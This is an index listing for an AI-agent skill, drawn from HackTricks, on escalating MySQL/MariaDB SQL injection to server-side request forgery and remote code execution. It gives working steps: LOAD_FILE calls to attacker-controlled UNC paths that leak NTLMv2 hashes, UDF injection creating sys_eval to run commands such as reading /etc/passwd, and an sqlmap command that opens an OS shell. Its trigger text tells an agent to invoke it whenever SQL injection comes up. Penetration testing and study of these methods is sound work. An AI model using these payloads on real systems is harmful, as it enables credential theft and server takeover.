OpenSkillIndex← back to search

Hacktricks-skills mysql-ssrf-rce

MySQL/MariaDB SSRF and RCE exploitation techniques via SQL injection. Use this skill when you have SQL injection access to a MySQL/MariaDB database and want to explore server-side request forgery (SSRF) or remote code execution (RCE) through database functions. Trigger this when investigating SQL injection vulnerabilities, performing authorized penetration testing, or analyzing MySQL database security. Make sure to use this skill whenever the user mentions SQL injection, MySQL exploitation, database SSRF, UDF injection, or wants to escalate from SQLi to code execution.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/mysql-injection/mysql-ssrf/SKILL.MD
source content

MySQL SSRF & RCE Exploitation

This skill covers advanced MySQL/MariaDB exploitation techniques for authorized security testing. These methods leverage SQL injection to achieve SSRF and RCE through database functions and user-defined functions.

Prerequisites

Before attempting these techniques, verify:

  • SQL injection access to MySQL/MariaDB/Percona database
  • Appropriate permissions (file_priv, plugin_dir access)
  • Understanding of secure_file_priv configuration
  • Authorization for security testing

SSRF via LOAD_FILE()

The 

LOAD_FILE()
function can initiate network requests when 
secure_file_priv
is disabled.

Check Configuration

SELECT @@secure_file_priv;
SELECT @@file_priv;

Interpretation:

  • secure_file_priv = ''
    (empty string): File access unrestricted
  • secure_file_priv = '/var/lib/mysql-files/'
    : Limited to this directory
  • secure_file_priv = NULL
    : File operations disabled

Windows UNC Path Exploitation

On Windows systems, UNC paths can trigger NTLMv2 hash exfiltration:

SELECT LOAD_FILE('\\attacker.com\share\file');

This connects to TCP port 445 and can be used to:

  • Exfiltrate NTLMv2 hashes
  • Access network shares with read privileges
  • Perform SSRF to internal resources

Example:

-- Exfiltrate NTLMv2 hash to attacker's SMB server
SELECT LOAD_FILE('\\192.168.1.100\share\capture');

Linux Network File Access

On Linux, network file access depends on OS configuration and mounted filesystems. NFS mounts may be accessible if properly configured.

RCE via User Defined Functions (UDF)

UDF injection allows loading external libraries to execute arbitrary code.

Requirements

  • Write access to 
    @@plugin_dir
  • file_priv
    = 'Y'
  • secure_file_priv
    = '' (disabled)

UDF Injection Process

  1. Check plugin directory:

    SELECT @@plugin_dir;

  2. Transfer UDF library (hex or base64 encoded)

  3. Create function:

    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf_sys.so';

  4. Execute commands:

    SELECT sys_eval('whoami');
SELECT sys_eval('cat /etc/passwd');

Common UDF Libraries

  • lib_mysqludf_sys
    - System command execution
  • lib_mysqludf_http
    - HTTP requests
  • Custom UDF libraries for specific needs

Alternative Plugin Paths

If 

@@plugin_dir
is not writable (MySQL > v5.0.67), try:

  • /usr/lib/mysql/plugin/
  • /usr/lib64/mysql/plugin/
  • /var/lib/mysql/
  • Any directory in system 
    $PATH

Automation with SQLMap

SQLMap supports UDF injection with the 

--udf-injection
flag:

sqlmap -u "http://target/vuln.php?id=1" --udf-injection --os-shell

For blind SQL injections, use output redirection or DNS request smuggling techniques.

Safety & Authorization

⚠️ These techniques are for authorized security testing only.

  • Always obtain written authorization before testing
  • Document all findings and methods used
  • Report vulnerabilities responsibly
  • Never use these techniques on systems you don't own or have permission to test

References